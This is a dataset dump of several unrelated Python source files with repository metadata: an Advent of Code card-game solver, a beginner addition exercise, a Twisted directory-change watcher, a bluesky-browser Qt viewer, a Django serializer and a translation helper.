1c44634315c59aaee3c879a33d1c2528c3e083a0
| 2,915
|
py
|
Python
|
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
import csv
import copy
def getCsv(txtFileName='twentysecond.txt'):
with open(txtFileName) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=' ')
return list(csv_reader)
def parseCardDecks(csvFile):
playerOne = []
playerTwo = []
isFirst = True
for row in csvFile:
if len(row) > 1:
continue
if not row:
isFirst = False
continue
if isFirst:
playerOne.append(int(row[0]))
else:
playerTwo.append(int(row[0]))
return [playerOne, playerTwo]
def playGame(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
while True:
if not playerOne or not playerTwo:
break
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
factors = list(range(50, 0, -1))
if playerOne:
points = [a * b for a, b in zip(playerOne, factors)]
else:
points = [a * b for a, b in zip(playerTwo, factors)]
return sum(points)
def playGameRecursive(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
oldConfigsPlayerOne = []
oldConfigsPlayerTwo = []
while True:
if not playerOne or not playerTwo:
return [playerOne, playerTwo]
if playerOne in oldConfigsPlayerOne and playerTwo in oldConfigsPlayerTwo:
return [playerOne, []]
oldConfigsPlayerOne.append(copy.deepcopy(playerOne))
oldConfigsPlayerTwo.append(copy.deepcopy(playerTwo))
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne <= len(playerOne) and cardTwo <= len(playerTwo):
subPlayerOne, subPlayerTwo = playGameRecursive(playerOne[:cardOne], playerTwo[:cardTwo])
if subPlayerOne:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
else:
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
def getPoints(finishedPlayerOne, finishedPlayerTwo):
maxPoints = max(len(finishedPlayerOne), len(finishedPlayerTwo))
factor = list(range(maxPoints, 0, -1))
if finishedPlayerOne:
pointsList = [a * b for a, b in zip(finishedPlayerOne, factor)]
else:
pointsList = [a * b for a, b in zip(finishedPlayerTwo, factor)]
return sum(pointsList)
csvFiles = getCsv()
arrayPlayerOne, arrayPlayerTwo = parseCardDecks(csvFiles)
finishedPlayerOne, finishedPlayerTwo = playGameRecursive(arrayPlayerOne, arrayPlayerTwo)
points = getPoints(finishedPlayerOne, finishedPlayerTwo)
print(points)
pass
| 28.861386
| 100
| 0.633276
|
import csv
import copy
def getCsv(txtFileName='twentysecond.txt'):
with open(txtFileName) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=' ')
return list(csv_reader)
def parseCardDecks(csvFile):
playerOne = []
playerTwo = []
isFirst = True
for row in csvFile:
if len(row) > 1:
continue
if not row:
isFirst = False
continue
if isFirst:
playerOne.append(int(row[0]))
else:
playerTwo.append(int(row[0]))
return [playerOne, playerTwo]
def playGame(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
while True:
if not playerOne or not playerTwo:
break
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
factors = list(range(50, 0, -1))
if playerOne:
points = [a * b for a, b in zip(playerOne, factors)]
else:
points = [a * b for a, b in zip(playerTwo, factors)]
return sum(points)
def playGameRecursive(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
oldConfigsPlayerOne = []
oldConfigsPlayerTwo = []
while True:
if not playerOne or not playerTwo:
return [playerOne, playerTwo]
if playerOne in oldConfigsPlayerOne and playerTwo in oldConfigsPlayerTwo:
return [playerOne, []]
oldConfigsPlayerOne.append(copy.deepcopy(playerOne))
oldConfigsPlayerTwo.append(copy.deepcopy(playerTwo))
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne <= len(playerOne) and cardTwo <= len(playerTwo):
subPlayerOne, subPlayerTwo = playGameRecursive(playerOne[:cardOne], playerTwo[:cardTwo])
if subPlayerOne:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
else:
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
def getPoints(finishedPlayerOne, finishedPlayerTwo):
maxPoints = max(len(finishedPlayerOne), len(finishedPlayerTwo))
factor = list(range(maxPoints, 0, -1))
if finishedPlayerOne:
pointsList = [a * b for a, b in zip(finishedPlayerOne, factor)]
else:
pointsList = [a * b for a, b in zip(finishedPlayerTwo, factor)]
return sum(pointsList)
csvFiles = getCsv()
arrayPlayerOne, arrayPlayerTwo = parseCardDecks(csvFiles)
finishedPlayerOne, finishedPlayerTwo = playGameRecursive(arrayPlayerOne, arrayPlayerTwo)
points = getPoints(finishedPlayerOne, finishedPlayerTwo)
print(points)
pass
| true
| true
|
1c44638e5289159fd6642dbde2d28bf744b91d3c
| 72
|
py
|
Python
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 41
|
2020-10-25T15:03:58.000Z
|
2022-03-18T02:43:27.000Z
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 1
|
2021-05-18T07:53:05.000Z
|
2021-05-21T19:09:42.000Z
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 22
|
2020-12-13T13:34:21.000Z
|
2022-02-05T19:36:57.000Z
|
from apriori_python.apriori import *
from apriori_python.utils import *
| 36
| 37
| 0.833333
|
from apriori_python.apriori import *
from apriori_python.utils import *
| true
| true
|
1c44646f843cea9fb6ce2b8eab0852efc6aca10c
| 299
|
py
|
Python
|
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
# n1 = input('Digite um valor: ')
# n2 = input('Digite outro valor: ')
# s = n1 + n2
# print('A soma entre {} e {} é igual a {}!'.format(n1, n2, s))
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
s = n1 + n2
print('A soma entre {} e {} é igual a {}!'.format(n1, n2, s))
| 37.375
| 63
| 0.568562
|
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
s = n1 + n2
print('A soma entre {} e {} é igual a {}!'.format(n1, n2, s))
| true
| true
|
1c446470ca7bdbc10b3f8ec6dcaba559b291e735
| 4,849
|
py
|
Python
|
twext/internet/fswatch.py
|
troglodyne/ccs-twistedextensions
|
1b43cb081ba68ae310140a9e853e041cd6362625
|
[
"Apache-2.0"
] | 23
|
2016-08-14T07:20:27.000Z
|
2021-11-08T09:47:45.000Z
|
twext/internet/fswatch.py
|
DalavanCloud/ccs-twistedextensions
|
2c4046df88873dcf33fba7840ed90e4238dcbec7
|
[
"Apache-2.0"
] | 2
|
2016-12-15T17:51:49.000Z
|
2019-05-12T15:59:03.000Z
|
twext/internet/fswatch.py
|
DalavanCloud/ccs-twistedextensions
|
2c4046df88873dcf33fba7840ed90e4238dcbec7
|
[
"Apache-2.0"
] | 20
|
2016-08-17T06:51:00.000Z
|
2022-03-26T11:55:56.000Z
|
##
# Copyright (c) 2013-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Watch the availablity of a file system directory
"""
import os
from zope.interface import Interface
from twisted.internet import reactor
from twisted.python.log import Logger
try:
from select import (
kevent, KQ_FILTER_VNODE, KQ_EV_ADD, KQ_EV_ENABLE,
KQ_EV_CLEAR, KQ_NOTE_DELETE, KQ_NOTE_RENAME, KQ_EV_EOF
)
kqueueSupported = True
except ImportError:
# kqueue not supported on this platform
kqueueSupported = False
class IDirectoryChangeListenee(Interface):
"""
A delegate of DirectoryChangeListener
"""
def disconnected():
"""
The directory has been unmounted
"""
def deleted():
"""
The directory has been deleted
"""
def renamed():
"""
The directory has been renamed
"""
def connectionLost(reason):
"""
The file descriptor has been closed
"""
# TODO: better way to tell if reactor is kqueue or not
if kqueueSupported and hasattr(reactor, "_doWriteOrRead"):
def patchReactor(reactor):
# Wrap _doWriteOrRead to support KQ_FILTER_VNODE
origDoWriteOrRead = reactor._doWriteOrRead
def _doWriteOrReadOrVNodeEvent(selectable, fd, event):
origDoWriteOrRead(selectable, fd, event)
if event.filter == KQ_FILTER_VNODE:
selectable.vnodeEventHappened(event)
reactor._doWriteOrRead = _doWriteOrReadOrVNodeEvent
patchReactor(reactor)
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
if evt.flags & KQ_EV_EOF:
self._listenee.disconnected()
if evt.fflags & KQ_NOTE_DELETE:
self._listenee.deleted()
if evt.fflags & KQ_NOTE_RENAME:
self._listenee.renamed()
def startListening(self):
ke = kevent(self._fd, filter=KQ_FILTER_VNODE,
flags=(KQ_EV_ADD | KQ_EV_ENABLE | KQ_EV_CLEAR),
fflags=KQ_NOTE_DELETE | KQ_NOTE_RENAME)
self._reactor._kq.control([ke], 0, None)
self._reactor._selectables[self._fd] = self
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
else:
# TODO: implement this for systems without kqueue support:
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
pass
def startListening(self):
pass
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
| 29.932099
| 76
| 0.622603
|
import os
from zope.interface import Interface
from twisted.internet import reactor
from twisted.python.log import Logger
try:
from select import (
kevent, KQ_FILTER_VNODE, KQ_EV_ADD, KQ_EV_ENABLE,
KQ_EV_CLEAR, KQ_NOTE_DELETE, KQ_NOTE_RENAME, KQ_EV_EOF
)
kqueueSupported = True
except ImportError:
kqueueSupported = False
class IDirectoryChangeListenee(Interface):
def disconnected():
def deleted():
def renamed():
def connectionLost(reason):
if kqueueSupported and hasattr(reactor, "_doWriteOrRead"):
def patchReactor(reactor):
origDoWriteOrRead = reactor._doWriteOrRead
def _doWriteOrReadOrVNodeEvent(selectable, fd, event):
origDoWriteOrRead(selectable, fd, event)
if event.filter == KQ_FILTER_VNODE:
selectable.vnodeEventHappened(event)
reactor._doWriteOrRead = _doWriteOrReadOrVNodeEvent
patchReactor(reactor)
class DirectoryChangeListener(Logger, object):
def __init__(self, reactor, dirname, listenee):
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
if evt.flags & KQ_EV_EOF:
self._listenee.disconnected()
if evt.fflags & KQ_NOTE_DELETE:
self._listenee.deleted()
if evt.fflags & KQ_NOTE_RENAME:
self._listenee.renamed()
def startListening(self):
ke = kevent(self._fd, filter=KQ_FILTER_VNODE,
flags=(KQ_EV_ADD | KQ_EV_ENABLE | KQ_EV_CLEAR),
fflags=KQ_NOTE_DELETE | KQ_NOTE_RENAME)
self._reactor._kq.control([ke], 0, None)
self._reactor._selectables[self._fd] = self
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
else:
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
pass
def startListening(self):
pass
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
| true
| true
|
1c44647222191c391e494faa2f304c10eae6fbf7
| 9,471
|
py
|
Python
|
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
import collections
import enum
from functools import partial
import itertools
import logging
from event_model import RunRouter, Filler
from intake_bluesky.core import parse_handler_registry
from qtpy.QtCore import Signal, QThread
from qtpy.QtWidgets import (
QAction,
QActionGroup,
QInputDialog,
QVBoxLayout,
)
from traitlets.traitlets import List, Dict, DottedObjectName
from .header_tree import HeaderTreeFactory
from .baseline import BaselineFactory
from .figures import FigureManager
from ..utils import (
MoveableTabWidget,
ConfigurableMoveableTabContainer,
ConfigurableQTabWidget,
load_config)
log = logging.getLogger('bluesky_browser')
class Viewer(ConfigurableMoveableTabContainer):
"""
Contains multiple TabbedViewingAreas
"""
tab_titles = Signal([tuple])
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self._run_to_tabs = collections.defaultdict(list)
self._title_to_tab = {}
self._tabs_from_streaming = []
self._overplot = OverPlotState.individual_tab
self._overplot_target = None
self._live_enabled = False
self._live_run_router = RunRouter([self.route_live_stream])
self._containers = [TabbedViewingArea(self, menuBar=menuBar) for _ in range(2)]
layout = QVBoxLayout()
for container in self._containers:
layout.addWidget(container)
self.setLayout(layout)
overplot_group = QActionGroup(self)
self.off = QAction('&Off', self)
self.off.setStatusTip('Drop streaming data.')
self.individual_tab = QAction('&New Tab', self)
self.individual_tab.setStatusTip('Open a new viewer tab for each Run.')
self.latest_live = QAction('&Latest Live Tab', self)
self.latest_live.setStatusTip('Attempt to overplot on the most recent live Run.')
self.fixed = QAction('&Fixed Tab...', self)
self.fixed.setStatusTip('Attempt to overplot on a specific tab.')
self.fixed.setEnabled(False)
overplot_group.addAction(self.off)
overplot_group.addAction(self.individual_tab)
overplot_group.addAction(self.latest_live)
overplot_group.addAction(self.fixed)
for action in overplot_group.actions():
action.setCheckable(True)
overplot_group.setExclusive(True)
self.off.setChecked(True)
overplot_menu = menuBar().addMenu('&Streaming')
overplot_menu.addActions(overplot_group.actions())
self.off.triggered.connect(self.disable_live)
self.individual_tab.triggered.connect(partial(self.set_overplot_state, OverPlotState.individual_tab))
self.latest_live.triggered.connect(partial(self.set_overplot_state, OverPlotState.latest_live))
def set_overplot_target():
item, ok = QInputDialog.getItem(
self, "Select Tab", "Tab", tuple(self._title_to_tab), 0, False)
if not ok:
# Abort and fallback to Off. Would be better to fall back to
# previous state (which could be latest_live) but it's not
# clear how to know what that state was.
self.off.setChecked(True)
return
self.set_overplot_state(OverPlotState.fixed)
self._overplot_target = item
self.fixed.triggered.connect(set_overplot_target)
def enable_live(self):
self._live_enabled = True
def disable_live(self):
self._live_enabled = False
def consumer(self, item):
"""Slot that receives (name, doc) and unpacks it into RunRouter."""
self._live_run_router(*item)
def route_live_stream(self, name, start_doc):
"""Create or choose a Viewer to receive this Run."""
if not self._live_enabled:
log.debug("Streaming Run ignored because Streaming is disabled.")
return [], []
self.fixed.setEnabled(True)
target_area = self._containers[0]
uid = start_doc['uid']
if self._overplot == OverPlotState.individual_tab:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
elif self._overplot == OverPlotState.fixed:
viewer = self._title_to_tab[self._overplot_target]
elif self._overplot == OverPlotState.latest_live:
if self._tabs_from_streaming:
viewer = self._tabs_from_streaming[-1]
else:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
self._run_to_tabs[uid].append(viewer)
viewer.run_router('start', start_doc)
return [viewer.run_router], []
def show_entries(self, target, entries):
self.fixed.setEnabled(True)
target_area = self._containers[0]
if not target:
# Add new Viewer tab.
viewer = RunViewer()
if len(entries) == 1:
entry, = entries
uid = entry().metadata['start']['uid']
tab_title = uid[:8]
else:
tab_title = self.get_title()
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
else:
viewer = self._title_to_tab[target]
for entry in entries:
viewer.load_entry(entry)
uid = entry().metadata['start']['uid']
self._run_to_tabs[uid].append(viewer)
# TODO Make last entry in the list the current widget.
def get_title(self):
for i in itertools.count(1):
title = f'Group {i}'
if title in self._title_to_tab:
continue
return title
def set_overplot_state(self, state):
self.enable_live()
log.debug('Overplot state is %s', state)
self._overplot = state
def close_run_viewer(self, widget):
try:
self._tabs_from_streaming.remove(widget)
except ValueError:
pass
for uid in widget.uids:
self._run_to_tabs[uid].remove(widget)
for title, tab in list(self._title_to_tab.items()):
if tab == widget:
del self._title_to_tab[title]
self.tab_titles.emit(tuple(self._title_to_tab))
if title == self._overplot_target:
self.set_overplot_state(OverPlotState.off)
if not self._title_to_tab:
self.fixed.setEnabled(False)
class TabbedViewingArea(MoveableTabWidget):
"""
Contains RunViewers
"""
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self.setTabsClosable(True)
self.tabCloseRequested.connect(self.close_tab)
def close_tab(self, index):
widget = self.widget(index)
self.parent().close_run_viewer(widget)
self.removeTab(index)
class RunViewer(ConfigurableQTabWidget):
"""
Contains tabs showing various view on the data from one Run.
"""
factories = List([HeaderTreeFactory,
BaselineFactory,
FigureManager], config=True)
handler_registry = Dict(DottedObjectName(), config=True)
def __init__(self, *args, **kwargs):
self.update_config(load_config())
super().__init__(*args, **kwargs)
self._entries = []
self._uids = []
self._active_loaders = set()
def filler_factory(name, doc):
filler = Filler(parse_handler_registry(self.handler_registry))
filler('start', doc)
return [filler], []
self.run_router = RunRouter(
[filler_factory] +
[factory(self.addTab) for factory in self.factories])
@property
def entries(self):
return self._entries
@property
def uids(self):
return self._uids
def load_entry(self, entry):
"Load all documents from intake and push them through the RunRouter."
self._entries.append(entry)
datasource = entry()
self._uids.append(datasource.metadata['start']['uid'])
entry_loader = EntryLoader(entry, self._active_loaders)
entry_loader.signal.connect(self.run_router)
entry_loader.start()
class EntryLoader(QThread):
signal = Signal([str, dict])
def __init__(self, entry, loaders, *args, **kwargs):
self.entry = entry
self.loaders = loaders
self.loaders.add(self) # Keep it safe from gc.
super().__init__(*args, **kwargs)
def run(self):
for name, doc in self.entry().read_canonical():
self.signal.emit(name, doc)
self.loaders.remove(self)
class OverPlotState(enum.Enum):
individual_tab = enum.auto()
latest_live = enum.auto()
fixed = enum.auto()
| 35.339552
| 109
| 0.629606
|
import collections
import enum
from functools import partial
import itertools
import logging
from event_model import RunRouter, Filler
from intake_bluesky.core import parse_handler_registry
from qtpy.QtCore import Signal, QThread
from qtpy.QtWidgets import (
QAction,
QActionGroup,
QInputDialog,
QVBoxLayout,
)
from traitlets.traitlets import List, Dict, DottedObjectName
from .header_tree import HeaderTreeFactory
from .baseline import BaselineFactory
from .figures import FigureManager
from ..utils import (
MoveableTabWidget,
ConfigurableMoveableTabContainer,
ConfigurableQTabWidget,
load_config)
log = logging.getLogger('bluesky_browser')
class Viewer(ConfigurableMoveableTabContainer):
tab_titles = Signal([tuple])
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self._run_to_tabs = collections.defaultdict(list)
self._title_to_tab = {}
self._tabs_from_streaming = []
self._overplot = OverPlotState.individual_tab
self._overplot_target = None
self._live_enabled = False
self._live_run_router = RunRouter([self.route_live_stream])
self._containers = [TabbedViewingArea(self, menuBar=menuBar) for _ in range(2)]
layout = QVBoxLayout()
for container in self._containers:
layout.addWidget(container)
self.setLayout(layout)
overplot_group = QActionGroup(self)
self.off = QAction('&Off', self)
self.off.setStatusTip('Drop streaming data.')
self.individual_tab = QAction('&New Tab', self)
self.individual_tab.setStatusTip('Open a new viewer tab for each Run.')
self.latest_live = QAction('&Latest Live Tab', self)
self.latest_live.setStatusTip('Attempt to overplot on the most recent live Run.')
self.fixed = QAction('&Fixed Tab...', self)
self.fixed.setStatusTip('Attempt to overplot on a specific tab.')
self.fixed.setEnabled(False)
overplot_group.addAction(self.off)
overplot_group.addAction(self.individual_tab)
overplot_group.addAction(self.latest_live)
overplot_group.addAction(self.fixed)
for action in overplot_group.actions():
action.setCheckable(True)
overplot_group.setExclusive(True)
self.off.setChecked(True)
overplot_menu = menuBar().addMenu('&Streaming')
overplot_menu.addActions(overplot_group.actions())
self.off.triggered.connect(self.disable_live)
self.individual_tab.triggered.connect(partial(self.set_overplot_state, OverPlotState.individual_tab))
self.latest_live.triggered.connect(partial(self.set_overplot_state, OverPlotState.latest_live))
def set_overplot_target():
item, ok = QInputDialog.getItem(
self, "Select Tab", "Tab", tuple(self._title_to_tab), 0, False)
if not ok:
# clear how to know what that state was.
self.off.setChecked(True)
return
self.set_overplot_state(OverPlotState.fixed)
self._overplot_target = item
self.fixed.triggered.connect(set_overplot_target)
def enable_live(self):
self._live_enabled = True
def disable_live(self):
self._live_enabled = False
def consumer(self, item):
self._live_run_router(*item)
def route_live_stream(self, name, start_doc):
if not self._live_enabled:
log.debug("Streaming Run ignored because Streaming is disabled.")
return [], []
self.fixed.setEnabled(True)
target_area = self._containers[0]
uid = start_doc['uid']
if self._overplot == OverPlotState.individual_tab:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
elif self._overplot == OverPlotState.fixed:
viewer = self._title_to_tab[self._overplot_target]
elif self._overplot == OverPlotState.latest_live:
if self._tabs_from_streaming:
viewer = self._tabs_from_streaming[-1]
else:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
self._run_to_tabs[uid].append(viewer)
viewer.run_router('start', start_doc)
return [viewer.run_router], []
def show_entries(self, target, entries):
self.fixed.setEnabled(True)
target_area = self._containers[0]
if not target:
# Add new Viewer tab.
viewer = RunViewer()
if len(entries) == 1:
entry, = entries
uid = entry().metadata['start']['uid']
tab_title = uid[:8]
else:
tab_title = self.get_title()
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
else:
viewer = self._title_to_tab[target]
for entry in entries:
viewer.load_entry(entry)
uid = entry().metadata['start']['uid']
self._run_to_tabs[uid].append(viewer)
# TODO Make last entry in the list the current widget.
def get_title(self):
for i in itertools.count(1):
title = f'Group {i}'
if title in self._title_to_tab:
continue
return title
def set_overplot_state(self, state):
self.enable_live()
log.debug('Overplot state is %s', state)
self._overplot = state
def close_run_viewer(self, widget):
try:
self._tabs_from_streaming.remove(widget)
except ValueError:
pass
for uid in widget.uids:
self._run_to_tabs[uid].remove(widget)
for title, tab in list(self._title_to_tab.items()):
if tab == widget:
del self._title_to_tab[title]
self.tab_titles.emit(tuple(self._title_to_tab))
if title == self._overplot_target:
self.set_overplot_state(OverPlotState.off)
if not self._title_to_tab:
self.fixed.setEnabled(False)
class TabbedViewingArea(MoveableTabWidget):
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self.setTabsClosable(True)
self.tabCloseRequested.connect(self.close_tab)
def close_tab(self, index):
widget = self.widget(index)
self.parent().close_run_viewer(widget)
self.removeTab(index)
class RunViewer(ConfigurableQTabWidget):
factories = List([HeaderTreeFactory,
BaselineFactory,
FigureManager], config=True)
handler_registry = Dict(DottedObjectName(), config=True)
def __init__(self, *args, **kwargs):
self.update_config(load_config())
super().__init__(*args, **kwargs)
self._entries = []
self._uids = []
self._active_loaders = set()
def filler_factory(name, doc):
filler = Filler(parse_handler_registry(self.handler_registry))
filler('start', doc)
return [filler], []
self.run_router = RunRouter(
[filler_factory] +
[factory(self.addTab) for factory in self.factories])
@property
def entries(self):
return self._entries
@property
def uids(self):
return self._uids
def load_entry(self, entry):
self._entries.append(entry)
datasource = entry()
self._uids.append(datasource.metadata['start']['uid'])
entry_loader = EntryLoader(entry, self._active_loaders)
entry_loader.signal.connect(self.run_router)
entry_loader.start()
class EntryLoader(QThread):
signal = Signal([str, dict])
def __init__(self, entry, loaders, *args, **kwargs):
self.entry = entry
self.loaders = loaders
self.loaders.add(self) # Keep it safe from gc.
super().__init__(*args, **kwargs)
def run(self):
for name, doc in self.entry().read_canonical():
self.signal.emit(name, doc)
self.loaders.remove(self)
class OverPlotState(enum.Enum):
individual_tab = enum.auto()
latest_live = enum.auto()
fixed = enum.auto()
| true
| true
|
1c44648c4b45e9fcff2f7d4448d645a78980e555
| 261
|
py
|
Python
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 32
|
2017-02-22T13:38:38.000Z
|
2022-03-31T23:29:54.000Z
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 694
|
2017-02-15T23:09:52.000Z
|
2022-03-31T23:16:07.000Z
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 35
|
2017-09-02T21:13:09.000Z
|
2022-02-21T11:30:30.000Z
|
from rest_framework.serializers import ModelSerializer
from apps.splash.models import SplashEvent
class SplashEventSerializer(ModelSerializer):
class Meta:
model = SplashEvent
fields = ("id", "title", "content", "start_time", "end_time")
| 26.1
| 69
| 0.731801
|
from rest_framework.serializers import ModelSerializer
from apps.splash.models import SplashEvent
class SplashEventSerializer(ModelSerializer):
class Meta:
model = SplashEvent
fields = ("id", "title", "content", "start_time", "end_time")
| true
| true
|
1c4465651a88a27dd1226447cce30e3be39112c4
| 687
|
py
|
Python
|
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | null | null | null |
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | 5
|
2021-02-10T02:41:20.000Z
|
2022-03-12T00:56:56.000Z
|
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains helpers for the translation process.
"""
from django.utils.text import format_lazy
def ugettext_many_lazy(*strings):
"""
This function is a wrapper for :func:`django.utils.text.format_lazy` for the special case that the given strings
should be concatenated with a space in between. This is useful for splitting lazy translated strings by sentences
which improves the translation memory.
:param strings: A list of lazy translated strings which should be concatinated
:type strings: list
:return: A lazy formatted string
:rtype: str
"""
fstring = ("{} " * len(strings)).strip()
return format_lazy(fstring, *strings)
| 32.714286
| 117
| 0.726346
|
from django.utils.text import format_lazy
def ugettext_many_lazy(*strings):
fstring = ("{} " * len(strings)).strip()
return format_lazy(fstring, *strings)
| true
| true
|
